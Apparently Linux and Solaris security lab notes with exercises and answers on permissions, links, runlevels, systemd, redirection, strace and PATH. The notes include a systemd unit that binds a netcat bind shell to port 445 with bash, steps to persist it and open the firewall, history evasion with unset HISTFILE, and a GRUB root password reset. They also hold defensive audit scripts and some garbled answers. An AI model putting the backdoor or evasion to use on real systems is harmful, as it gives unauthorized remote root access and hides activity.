Linuxnotes
Answer: The kernel is a set of critical programs that provide an environment where user
processes can execute and interact with system resources in a secure manner.
2. Describe the mechanisms of process instantiation on Unix systems. Answer: A process is created with two system calls: exec() and fork()
3. What information constitutes the metadata of a file? Where is the metadata stored? Answer: Information about the object such as object
type (e.g., regular file, directory, pipe, etc.), access permissions, timestamps, etc. The metadata for the object is stored in a data structure
called an inode.
4. What are the standard directories found in the root of the Unix file system and what is stored within each?
5. What indicators of compromise might one look for when analyzing the file system? Answer: When analyzing processes for anomalies, one of
the important things to look at is the location of the executable, of any log files, or of any other open resources.
6. In simple terms, what is a process? Answer: Processes are programs that run in user space. In addition to running user programs,
including application services, processes also run a large number of programs for the OS that do not require kernel space access.
7. List some common processes expected on a standard Linux box, but not on a Solaris box and vice versa. Answer: Page 163
8.
The configuration files for programs are typically located in which directory? /etc
The startup configuration files for the system services are located in which directory for a systemD system? The mechanics of starting or
stopping daemons is performed by a set of shell scripts, often called init scripts or rc scripts. In a typical SystemV Unix system, the directory
named /etc/rc.d/init.d contains the startup script for each system service. This script is provided by the writer of each piece of software and
must be written to accept one parameter - the action to take when script is run. In a typical systemd Unix system, the directory
/etc/systemd/system or /lib/systemd/system typically contains the startup unit for each system service.
The log files for programs are typically found in which directory? /var/log
Information about the running instance of a program can be found in which directory? /proc
Give the syntax/command to show which groups the intern01 is a member of and list which groups (if any) are returned. #groups intern01
Add a group to the CentOS machine called hackers, and provide the syntax/command used. #groupadd hackers
Set the owner of the getUID file to the root account and provide the syntax/command used. #chown root getUID
Set the group of the getUID file to hackers and provide the syntax/command used. #chgrp hackers getUID
Explicitly set the octal permissions of the getUID file to: User/Owner: Read/Write/Execute, Group: Read/Execute, Other: None What
syntax/command was used? #chmod 0750 getUID
Complete the following actions: Add the user intern01 to the hackers group. What syntax/command was used? #usermod -a -G hackers
intern01
Set the SUID flag on the program getUID. What syntax/command was used? #chmod u+s getUID
Change the user and group owners to match the exhibit. #su root #chown leale:managment data1 #chown enairn:engineer data2 #chown
rsanch:syseng data3
Change the data file permissions to match the exhibit. Use the absolute octal notation.
Command                       Definition
cat [FILE]                    Concatenate file to screen
cd                            Change directory
cp [source] [target]          Copy source to target
file                          Determine file type
find                          Search for files in directory hierarchy
grep PATTERN [FILE]           Print lines matching PATTERN from FILE
groupadd                      Create a new group
groups                        Print the groups a user belongs to
head [FILE]                   Output first 10 lines of a file
less [FILE]                   Similar to more but handles larger files much faster
locate                        Find files by name (Linux)
ln -s [target] [link_name]    Create symbolic link from SOURCE to LINK_NAME
ls                            Directory listing
man                           Display online help
man -k SEARCH_STRING          Search for specified SEARCH_STRING in man page
more [FILE]                   Output the contents
st
# touch /tmp/file.txt
# touch /tmp/other.txt
Create a soft (or symbolic) link in the root account's home directory named myTempFile that links to /tmp/file.txt.
What syntax/command was used?
# ln -s /tmp/file.txt myTempFile
What is the expected output of the following?
hello world
Run the following commands and explain the results:
# rm -f /tmp/file.txt
# ls -l myTempFile
Deleting the original file will break the symbolic link. The output of the ls command will turn the file myTempFile red.
# cat myTempFile
No such file or directory. The original file that the link points to is gone.
Create a hard link in the root account's home directory named otherTempFile that links to /tmp/other.txt.
What syntax/command was used?
ln /tmp/other.txt otherTempFile
# cat otherTempFile
Additionally, explain the critical difference between hard and soft links.
The command cat displays the contents of the file:
one
two
three
In hard links, deleting the sourcefile doesn’t affect the newfile.
Finding files that match certain criteria is a common task on a filesystem. Linux and BSD variants generally install the locate package, which
creates an indexed database of filenames (created using the updatedb command and usually installed as a cron job) and uses the locate
command to find files. The locate command is fast, but it is limited to searching filenames.
All UNIX variants support the find command, and it can search on a much more robust set of characteristics than locate. The search can be
slow as the query is conducted in real time. The find command is powerful but has a bit of a learning curve.
The basic syntax of the find command is shown below:
Path
<path> Indicates the path in the filesystem to begin the search and recursively searches unless configured otherwise.
Criteria
-name - Examine the filename. Wildcards (*) can be used.
-user - Examine the owner of the file.
-perm - Examine file permissions.
Note: Multiple criteria are joined with a Boolean 'and' operator by default.
Actions
The actions can be useful but are beyond the scope of this lesson. By default, if no actions are added, the -print action is assumed, which
prints all matches to STDOUT.
Example
The following syntax/command can be used to search the entire filesystem for any file named passwd:
# locate apache2.conf
# locate /etc*apache2.conf
The first locate command will search the entire filesystem for a file named apache2.conf.
The second locate command will only search the directory /etc for a file named apache2.conf.
Run the following commands on the Solaris machine as the user root and explain the results:
locate httpd.conf
locate */httpd.conf
The first locate command will search the entire filesystem for a filename that contains httpd.conf.
The second locate command will search the entire filesystem for a filename that matches exactly httpd.conf.
On the CentOS, Ubuntu and Solaris machines, find all files owned by the root user and document the syntax/command used.
Note: Ubuntu commands will need to be run with the sudo command.
More Notes
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 09:35:46 ? 0:01 sched
root 5 0 0 09:35:44 ? 0:01 zpool-rpool
root 0 0 0 09:35:47 ? 0:00 kmem_task
root 0 0 0 09:35:47 ? 0:00 /usr/sbin/init
root 0 0 0 09:35:47 ? 0:00 pageout
root 0 0 0 09:35:47 ? 0:00 fsflush
root 7 0 0 09:35:47 ? 0:00 intrd
root 8 0 0 09:35:47 ? 0:00 vmtasks
root 117 0 0 09:35:57 ? 0:00 /usr/lib/pfexecd
root 11 1 0 09:35:48 ? 0:02 /lib/svc/bin/svc.startd
root 13 1 0 09:35:48 ? 0:10 /lib/svc/bin/svc.configd
root 620 0 0 09:36:03 ? 0:00 /usr/sbin/nscd
netadm 381 1 0 09:36:00 ? 0:00 /lib/inet/nwamd
netcfg 40 1 0 09:35:51 ? 0:00 /lib/inet/netcfgd
root 734 710 0 09:36:06 ? 0:00 /usr/lib/hal/hald-addon-storage
root 709 0 0 09:36:04 ? 0:00 /usr/lib/hal/hald --daemon yes
dladm 48 0 0 09:35:53 ? 0:00 /usr/sbin/dlmgmtd
root 753 0 0 09:36:07 ? 0:00 /usr/lib/inet/inetd start
daemon 65 0 0 09:35:54 ? 0:00 /lib/crypto/kcfd
day and time did the machine start
kmem_task is a Solaris 11 process. init, which is expected to be present and with a PID of 1, is running from /usr/sbin (Solaris 10 init
runs from /sbin).
The answer is Solaris. The first entry is the kernel thread sched, which indicates that this process list came from a Solaris system. The two
kernel threads called pageout and fsflush (note they have a PPID of 0) again indicate that this is a Solaris system.
$ cd /tmp
$ touch ford.txt
$ ln -s ford.txt link_ford.txt
$ rm -f ford.txt
$ ls -alg link_ford.txt
lrwxrwxrwx 1 root 9 May 19 13:09 link_ford.txt -> ford.txt
3. Modify and change
4. Access
What timestamps will update on the directory when using tab completion?
A directory's atime updates whenever its contents are read. The system does this when it uses tab completion to display the filenames of the
directory.
# ls /root/initrd_ex/contents/bin
awk                 findmnt     mknod     systemctl
bash                flock       mount     systemd-cgls
cat                 gawk        mv        systemd-escape
cp                  grep        ping      systemd-run
dmesg               gzip        plymouth  systemd-tmpfiles
dracut-cmdline      journalctl  ps        teamd
dracut-cmdline-ask  kbd_mode    readlink  teamdctl
dracut-emergency    kmod        rm        teamnl
dracut-initqueue    less        sed       tr
dracut-mount        ln          setfont   true
dracut-pre-mount    loadkeys    setsid    udevadm
dracut-pre-pivot    loginctl    sh        umount
dracut-pre-trigger  ls          sleep     uname
dracut-pre-udev     mkdir       stat      vi
echo                mkfifo      stty
Explain what the following command does:
# /usr/lib/dracut/skipcpio ../initramfs.img | gunzip | cpio -id
The skipcpio command will extract concatenated cpio archives such as the initramfs.img file.
The gunzip command then unzips the archive.
The cpio command will copy files out of the unzipped archive.
What is the first process spawned by Solaris after the kernel is loaded?
# ps -elf
FS UID PID PPID C PRI NI ADDR SZ STIME TTY TIME CMD
1 T root 0 0 0 0 SY ? 0 Oct 30 ? 100:11 sched
What are the initial processes in SysV and SMF, respectively?
Change to runlevel 2
Verify the runlevel has changed
Capture the state of the services using the svcs command to a file named s1.txt
Capture the process list using the ps -ef command to a file named p1.txt
# init 2
# who -r
# svcs > s1.txt
# ps -ef > p1.txt
Complete the following actions and document the commands/syntax used:
Change to runlevel 3
Capture the state of the services using the svcs command to a file named s2.txt
Capture the process list using the ps -ef command to a file named p2.txt
Use the diff command to compare the contents of the services and process files
Record how many services are running in runlevel 3 that are not running in runlevel 2
# init 3
# svcs > s2.txt
# ps -ef > p2.txt
# diff s1.txt s2.txt
# diff p1.txt p2.txt
Using the svcs command, identify how many dependencies the sendmail service has and record the syntax/command used.
Instruction
Telnet into the sendmail server with the following command:
# telnet 127.0.0.1 25
The sendmail server will give a response. Type the following to exit telnet:
<CTRL> + ]
quit
Using the svcs milestone command, identify how many system milestones are present and record the syntax/command used.
Note: Changing milestones directly can lead to unstable system states. Milestones are not designed to be backtracked into (i.e., a
system should not be switched back into single-user-mode once in multi-user-mode).
The system remained in run-level 3 (multi-user) instead of going to run-level 1 (single user).
Reboot the machine. Record the runlevel and milestone the machine booted into and the syntax/command used
# who -r
. run-level multi-user Nov 3 09:26 S 0 0
Change to the all milestone and document the syntax/command used.
# svcs -a
The all milestone will start all enabled services.
Use the svcs command to determine whether the Apache web server is enabled for the multi-user milestone and record the syntax/command
used
What syntax/command was used to determine the default run level of the CentOS machine?
systemctl get-default
What syntax/command shows all active services on the machine?
systemctl list-units
What syntax/command shows the status of the crond service?
Log into the Solaris machine again and attempt another SSH session to the CentOS machine.
Explain the results of the attempt.
Connection succeeded since the SSHD process is still running. Stopping the SSH service will not kill the active daemon, but upon reboot it will
no longer be running.
Reboot the CentOS machine using the init command in the SSH session.
What syntax/command was used?
init 6
Log into the CentOS machine and run the following command:
# systemctl status sshd
Explain what the loaded and active output lines indicate.
The loaded field indicates that the module was found and loaded, but it is disabled on boot.
The active field indicates that the process is not currently running.
Enable the SSH service to start on boot.
What syntax/command was used?
systemctl enable sshd
Explain what the loaded and active output lines indicate using the following command:
# systemctl status sshd
The loaded field indicates that the module was found and loaded, and it is enabled on boot.
The active field indicates that the process is not currently running.
Document the steps an administrator would take to change root's password on a CentOS machine by modifying the GRUB boot record.
Warning: Only perform these actions on a local/physical machine.
Boot into single-user mode, which does not require a password, then reset the root password with the passwd command
Change the ro option to rw init=/bin/bash
Mount the root filesystem using the command chroot /sysroot/
Use the passwd command to change the root password
Use the reboot -f command to restart the machine
Use the following commands to create a persistent backdoor using netcat on the CentOS machine.
# cd /etc/systemd/system/
# vi backdoor.service
The contents of the backdoor.service file:
[Unit]
Description=Netcat backdoor daemon
Documentation=man:nc(1)
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/nc -lp 445 -e /bin/bash
Restart=always
[Install]
WantedBy=multi-user.target
Reload the daemons and enable the backdoor:
# systemctl daemon-reload
# systemctl start backdoor
# systemctl status backdoor
Allow incoming connections on port 445 through the firewall:
# firewall-cmd --add-port 445/tcp
Connect to the backdoor using the Solaris machine.
What syntax/command was used?
nc 10.10.1.40 445
Establish backdoor persistence on the CentOS machine after a restart.
What syntax/command was used?
Enable the service by using the following command:
systemctl enable backdoor
Restart the CentOS machine and try to connect to the backdoor from the Solaris Machine.
Was the connection successful?
Why or why not?
The firewall entry to allow port 445 was removed after the CentOS machine restarted. The --permanent flag needs to be added to the
firewall-cmd command to allow the port to remain open after reboot.
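Seen from the defender's side, the unit above leaves two traces: a start command that runs netcat with an execute option, and, once enabled, a symlink under multi-user.target.wants. The following check is an added example and not part of the original notes; the function names, the two regexes and the sample unit files are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: audit systemd unit directories for services whose start
# command runs netcat with an "execute a program" option, the pattern used by
# backdoor.service above. The regexes are heuristics picked for this example.

NC_BIN_RE='(^|[/[:space:]])(nc|ncat|netcat)([[:space:]]|$)'
NC_EXEC_RE='[[:space:]](-[A-Za-z]*[ec]|--(sh-|lua-)?exec)([[:space:]=]|$)'

# is_enabled DIR UNIT: succeeds if DIR holds a *.wants/ or *.requires/ symlink
# for UNIT, which is what "systemctl enable" creates to start it at boot.
is_enabled() {
    for _link in "$1"/*.wants/"$2" "$1"/*.requires/"$2"; do
        if [ -L "$_link" ]; then return 0; fi
    done
    return 1
}

# audit_units DIR...: print "unit<TAB>state<TAB>matching line" per finding.
audit_units() {
    for _dir in "$@"; do
        for _unit in "$_dir"/*.service; do
            if [ -f "$_unit" ]; then
                # Only the start commands are inspected.
                grep -E '^ExecStart(Pre|Post)?=' "$_unit" |
                while IFS= read -r _line; do
                    _cmd=${_line#*=}
                    if printf '%s\n' "$_cmd" | grep -Eq -e "$NC_BIN_RE" &&
                       printf '%s\n' "$_cmd" | grep -Eq -e "$NC_EXEC_RE"; then
                        if is_enabled "$_dir" "${_unit##*/}"; then
                            _state=enabled
                        else
                            _state=not-enabled
                        fi
                        printf '%s\t%s\t%s\n' "$_unit" "$_state" "$_line"
                    fi
                done
            fi
        done
    done
    return 0
}

# make_sample_units DIR: write two constructed unit files for the demo, the
# backdoor.service from the notes and a benign sshd-like unit, then enable
# the first one the way "systemctl enable" would (symlink in *.wants/).
make_sample_units() {
    mkdir -p "$1/multi-user.target.wants"
    cat > "$1/backdoor.service" <<'EOF'
[Unit]
Description=Netcat backdoor daemon
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/nc -lp 445 -e /bin/bash
Restart=always
[Install]
WantedBy=multi-user.target
EOF
    cat > "$1/sshd-sample.service" <<'EOF'
[Service]
ExecStart=/usr/sbin/sshd -D
[Install]
WantedBy=multi-user.target
EOF
    ln -sf ../backdoor.service "$1/multi-user.target.wants/backdoor.service"
}

# Demo on a throwaway directory built from the constructed samples.
demo_dir=$(mktemp -d)
make_sample_units "$demo_dir"
audit_units "$demo_dir"
rm -rf "$demo_dir"
```

On a live host, pass /etc/systemd/system and /usr/lib/systemd/system (or /lib/systemd/system) to audit_units. A flagged unit that `rpm -qf` reports as not owned by any package deserves a closer look.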
Disable the backdoor, stop the backdoor service, and remove any files associated with backdoor.service. Record the syntax/commands used.
multi-user.target
Which variable in the /etc/default/grub file would need to be edited in order to change the timeout from five seconds to fifteen seconds?
GRUB_TIMEOUT
# cat
Note: The cat command treats command line arguments as filenames and will open the files in order and write their contents to
STDOUT. A redirection operator (>) can be used to send the output to a file instead of STDOUT.
Run the following command to show the contents of the ex1 file:
# cat /tmp/ex1
cat /etc/shadow uses command line arguments to display the information, while cat < /etc/shadow will read a file from STDIN and
display the information.
Run the commands below and explain what happened to the output streams:
# cat "Hello World" > ex1
# cat ex1
The cat command runs and waits for the user to type something. Any content it receives is now appended to the ex1 file.
# cat ex1
Hello World
Run the following commands and record the results:
# echo "Hello World" | cat> ex1
# cat < ex1
# cat < ex1 > ex1
# echo < ex1 > ex1
# echo ex1 >> ex1
# cat < ex1 > box
# cat < ex1 | cat >> ex1
# cat < ex1 >> ex1
<CTRL> + <C>
# echo Clean the floor & cat box
# echo "Clean the floor & cat box"
Run this same sequence of commands on the Solaris machine and note any differences.
Uses cmd line arguments as input through echo and redirects STDOUT (via pipe) to the STDIN of cat, which will then redirect STDOUT to
the ex1 file. This places the text "Hello World" into the ex1 file.
The tee command reads from standard input and writes to standard output and files simultaneously.
The following command will generate a file listing and pipes STDOUT to the STDIN of the tee command, which creates a file
named filelisting and pipes STDOUT to STDIN of less:
Note: Tar is short for tape archive and was originally used to create backup tapes. However, it has been re-purposed as a method of
packaging a directory structure into a single file, typically called a tarball. Consult the man page for more information.
# mkdir /tmp/backup
# cd /tmp/backup
Use the tar command to create a backup of the /var/run directory named run.tar in the /tmp/backup directory, then extract
the run.tar backup into the /tmp/backup directory.
Answer the following:
# rm -rf /tmp/backup/*
Note: The /var/run directory contains symbolic links. By default the tar command will not follow symlinks and add them to the archive.
# cd /tmp/backup
# tar -hcf run.tar /var/run
# tar -xvf run.tar
# ls -l
total 8600
-rw-r--r--. 1 root root 8806400 Nov 3 16:07 run.tar
drwxr-xr-x. 3 root root 17 Nov 3 16:07 var
Write a chain of commands with the ; operator to complete the following and record the syntax/command used:
Change directory to /var/run
Tar the contents of the /var/run directory into /tmp/backup/run.tar
Change directory back to /tmp/backup
Document the final command below
CentOS
# which ps
/usr/bin/ps
# file `which ps`
/usr/bin/ps: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for
GNU/Linux 2.6.32, BuildID[sha1]=3ca95c5bfec071ba29e28124db03a693d9423904, stripped
Solaris
# which ps
/usr/bin/ps
# file `which ps`
/usr/bin/ps: ELF 32-bit LSB Executable 80386 Version 1, dynamically linked, stripped
On the CentOS machine, run the following strace commands and describe the differences:
# strace ps | less
Did the command work? Why or why not?
The strace command is producing output via the STDERR stream.
The pipe operator is expecting the data it is sending to the less command to come from the STDOUT stream.
Document the appropriate strace syntax to complete the following:
Redirect the strace command output to a file named pstrace1.txt using shell redirection operators.
Redirect the strace command output to a file named pstrace2.txt without using shell redirection operators.
# strace -o pstrace2.txt ps
Where in the file system is the strace command locating information for the ps command?
Note: The PID of the processes may be useful in referencing information within the pstrace1.txt file.
/proc/<PID>
# strace -o pstrace1.txt ps
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Answer the following questions regarding the pstrace1.txt file.
What command will find all references to the user's BASH shell?
How many lines refer to this PID?
What system call is used to print output to the screen?
Find all references to the user's BASH shell PID :
# strace -o pstrace1.txt ps
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Number of PID references:
# strace -o pstrace1.txt ps
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Based on the output of the following command, does the ps command use the fork or exec system call?
Note: This chain of commands shows a sorted, unique list of the system calls used by the ps command.
No, the ps command uses the exec system call.
# cat pstrace1.txt | awk -F '(' '{ print $1 }' | sort | uniq | grep exec
execve
# cat pstrace1.txt | grep fork
# cat pstrace1.txt | grep exec
execve("/usr/bin/ps", ["ps"], [/* 42 vars */]) = 0
Run the following command to compare the root.console and root.ssh text files:
Examine the process information for the current shell using the following command:
# ps -ef | grep $$
What does the $$ variable represent?
$$ indicates the current PID.
Which commands can be used to compare text files in Unix? List all that apply and record the syntax/command used.
# echo $0
bash
# ps -ef | grep $$
root 13039 13031 0 07:19 pts/0 00:00:00 bash
root 49553 13039 0 12:07 pts/0 00:00:00 ps -ef
What is the current directory?
# pwd
/home/intern01
What is the home directory of both root and intern01 specified in their environment?
# ifconfig -a
The command returns the interface configuration.
# which ifconfig
/usr/sbin/ifconfig
Which directory contains the ifconfig executable?
# which ifconfig
/usr/sbin/ifconfig
Change the entries in PATH by entering the following text into the shell window.
# PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/home/intern01/.local/bin:/home/intern01/bin
Run the ifconfig -a command in the root shell window using the full file path and record the syntax used.
/usr/sbin/ifconfig -a
# echo $PATH
# export PATH=${PATH}:/usr/sbin
# echo $PATH
# ifconfig -a
The path variable indicates where to look for binaries when running a program from the command line. If a path is not present inside of
the PATH variable, the complete path name must be used to run the program.
Exercise Takeaway
Always use full command paths. It can be difficult to predict what the PATH will look like in various environments, so users may be
unable to run commands not in the PATH. Users may run a malicious version of a command from a directory that appears earlier in the
PATH variable.
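The takeaway above can be checked mechanically. The following is an added example, not part of the original notes: audit_path flags PATH entries that let another file win the lookup, and resolve_all lists every directory that provides a given command in lookup order. The function names and the sample tree (two harmless ifconfig stubs) are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: audit a PATH string for risky entries and show which copy
# of a command the shell would actually run.

# audit_dir DIR: report an absolute PATH entry that is missing or world-writable.
audit_dir() {
    if [ ! -d "$1" ]; then
        printf '%s\t%s\n' "$1" 'missing'
        return 0
    fi
    # In "ls -l" output the ninth character is the write bit for "other".
    case $(ls -ldL "$1") in
        d???????w*) printf '%s\t%s\n' "$1" 'world-writable' ;;
    esac
    return 0
}

# audit_path PATHSTRING: print "entry<TAB>problem" for each risky entry.
audit_path() {
    _rest=$1:
    while [ -n "$_rest" ]; do
        _d=${_rest%%:*}
        _rest=${_rest#*:}
        case $_d in
            '') printf '%s\t%s\n' '(empty)' 'resolves to the current directory' ;;
            /*) audit_dir "$_d" ;;
            *)  printf '%s\t%s\n' "$_d" 'relative, resolved against the current directory' ;;
        esac
    done
    return 0
}

# resolve_all NAME PATHSTRING: print every PATH location holding an executable
# NAME, in lookup order; the first line is the one the shell runs.
resolve_all() {
    _rest=$2:
    while [ -n "$_rest" ]; do
        _d=${_rest%%:*}
        _rest=${_rest#*:}
        [ -n "$_d" ] || _d=.
        if [ -f "$_d/$1" ] && [ -x "$_d/$1" ]; then
            printf '%s\n' "$_d/$1"
        fi
    done
    return 0
}

# make_sample_tree ROOT: constructed layout for the demo. Both "ifconfig"
# files are harmless stubs standing in for the system binary and for a copy
# placed in a user's bin directory.
make_sample_tree() {
    mkdir -p "$1/usr/sbin" "$1/home/intern01/bin"
    for _f in "$1/usr/sbin/ifconfig" "$1/home/intern01/bin/ifconfig"; do
        printf '#!/bin/sh\necho "stub: %s"\n' "$_f" > "$_f"
        chmod 755 "$_f"
    done
    chmod 755 "$1/usr/sbin"
    chmod 777 "$1/home/intern01/bin"   # simulate a directory anyone can write to
}

# Demo: the user's bin directory is listed before the system directory.
demo_root=$(mktemp -d)
make_sample_tree "$demo_root"
demo_path="$demo_root/home/intern01/bin:$demo_root/usr/sbin"
audit_path "$demo_path"
resolve_all ifconfig "$demo_path"
rm -rf "$demo_root"
```

When resolve_all prints more than one line, the command is shadowed: every line after the first is a copy that will never run under that PATH.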
The su command lets users run commands as the root role, but it does not change to the root user when invoked in this way.
The /proc directory contains folders named after currently running processes. Record the command used to view the environ file of
the current shell's parent process.
# cat /proc/$PPID/environ
Pipe the output of the previous command to the following tr command to clean up the output and determine the value of the SHELL
environment variable:
tr '\0' '\n'
Note: The environ file uses the null character (\0, ASCII 0) instead of the newline character (\n, or ASCII 10) to separate records. This
command will replace the null character with a newline to make the output legible.
# pargs -e $PPID
Complete the following steps and explain the differences in the ps command output:
# ps -ef | grep $$
# ifconfig -a
The command executes because the environment variables of the new shell have not been modified.
Log into the Solaris machine as root and enter the following. Record any differences between ls and ls -a:
# cd ~
# ls
# ls -a
The -a option of the ls command displays hidden files. Hidden files are notated by a period at the beginning of the file name.
Look at the last line of the .bash_history file using the tail command and answer the following:
$ su root
# who am i
# exit
$ exit
SSH into the CentOS machine as the intern01 user and run the following:
$ su root
# cd /var
# cd log
# head messages
# unset HISTFILE
# exit
$ exit
Are any of the commands written to root's history?
The commands should not be written to root’s history.
<html>
<body>
Hello!
</body>
</html>
# ps -lA | grep web.sh
0 S 0 67339 67213 0 80 0 - 28283 do_wai pts/1 00:00:00 web.sh
1 S 0 67516 67339 0 80 0 - 28283 pipe_w pts/1 00:00:00 web.sh
All processes with a parent of the script:
# ps -lfA | grep 67339
0 S root 67339 67213 0 80 0 - 28283 do_wai 14:27 pts/1 00:00:00 /bin/bash ./web.sh
0 S root 67514 67339 0 80 0 - 26981 pipe_w 14:27 pts/1 00:00:00 cat www_fifo
0 S root 67515 67339 0 80 0 - 11004 poll_s 14:27 pts/1 00:00:00 nc -l 8080
1 S root 67516 67339 0 80 0 - 28283 pipe_w 14:27 pts/1 00:00:00 /bin/bash ./web.sh
Explain what the web.sh script is doing.
Run the web.sh script to find the temp.html file using the machine's web browser and record which URL was used.
localhost:8080/temp.html
Or
127.0.0.1:8080/temp.html
Or
<CentOS IP>:8080/temp.html
Which line of the script provides the branch that ensures a file exists in the /var/www directory?
13 if [ -f "$filename" ]; then
Close the web server and open it with a new invocation that will cause the script to listen on port 8082.
This line does not indicate a script argument. It indicates an argument to the awk command.
The fifth column of the long listing of a file indicates its file size.
# ls -l /var/www/temp
-rw-r--r--. 1 root root 37 Nov 6 14:42 /var/www/temp
The output of the ls -l command is piped to the awk command, which uses $5 to indicate the fifth column of the data it received
should be displayed.
What command should be run to view the current runlevel when working with systemd?
runlevel
who -r
Either is correct.
What file does the init command rely on to determine what to do when booting or changing the runlevel?
/etc/inittab or inittab
What command ensures that the httpd service does not start on boot when working with systemd?
Note: You may want to run the command on your CentOS machine to verify that it works.
systemctl disable httpd
Log in at the console. Assume that no other users are logged in to the system and that no commands have run.
Which process would you expect to see running on a SystemV system but NOT on a Solaris system?
According to the diagram, SystemV would have init, login and shell running if someone logged in using the console, but Solaris
would have init and shell running (no login process). SystemV has init running; init makes a copy of itself (fork()), which then
changes (exec()) to getty. getty then changes (exec()) to login. Once someone logs into the machine, login makes a copy of itself (fork()),
which changes (exec()) to shell.
Type the ls command (use shell expansion) to list all filenames that begin with the letter "a".
Note: Shell expansion is similar to REGEX in syntax
ls a*
Assume these commands are run in a BASH Shell on a CentOS machine. Use shell expansion to match all filenames that begin with the
letter "e" or the letter "d".
ls [de]*
Assume these commands are run in a BASH Shell on a CentOS machine. Use the ls command and shell expansion to match all
filenames that contain the sequence "ea."
ls *ea*
Assume these commands are run in a BASH Shell on a CentOS machine. Use the ls command and shell expansion to match all
filenames that do not end with the letter "r."
ls *[!r]
When a user presses Ctrl+Z to stop a process, that process will still exist in the process list.
True
Use the following output to identify the fourth script/executable referenced in the inittab that will run upon booting into the default
runlevel.
# cat /etc/inittab
id:3:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
x0:0:wait:/etc/rc.d/rc 0
x1:1:wait:/etc/rc.d/rc 1
x2:2:wait:/etc/rc.d/rc 2
x3:3:wait:/etc/rc.d/rc 3
x4:4:wait:/etc/rc.d/rc 4
x5:5:wait:/etc/rc.d/rc 5
x6:6:wait:/etc/rc.d/rc 6
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powered installed and your
# UPS connected and working correctly.
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
2:2345:respawn:/sbin/mingetty tty2
Explanation
# Any lines that begin with (#) are considered comments and are not executed
id:3:initdefault: (Sets the default run level for the box, not a script)
si::sysinit:/etc/rc.d/rc.sysinit (Always executed, script 1)
x3:3:wait:/etc/rc.d/rc 3 (Executed as it is the default run level, script 2)
The following are conditional, so they won’t execute automatically.
ca::ctrlaltdel:/sbin/shutdown -t3 -r now (Not an external script)
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
1:2345:respawn:/sbin/mingetty tty1 (Script 3)
2:2345:respawn:/sbin/mingetty tty2 (Script 4)
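The walk-through above can be reproduced with a small parser, which is also a quick way to review what a SysV box starts at boot. This is an added example, not part of the original notes: the function names are assumptions, the sample file is an abridged, constructed copy of the listing, and the parser goes slightly beyond the explanation by also handling the boot, bootwait and once actions.

```shell
#!/bin/sh
# Added example: list, in execution order, the commands a SysV init starts
# when booting into the default runlevel named by the initdefault entry.

# boot_sequence FILE: print one command per line.
boot_sequence() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }      # comments and blank lines
        NF < 4         { next }      # not an id:runlevels:action:process entry
        {
            proc = $4                # the process field may itself contain ":"
            for (i = 5; i <= NF; i++) proc = proc ":" $i
            if ($3 == "initdefault") {
                def = $2             # default runlevel, not a command
            } else if ($3 == "sysinit") {
                sysinit[++ns] = proc # always runs first, runlevels field ignored
            } else if ($3 == "boot" || $3 == "bootwait") {
                boot[++nb] = proc    # runs after sysinit, runlevels field ignored
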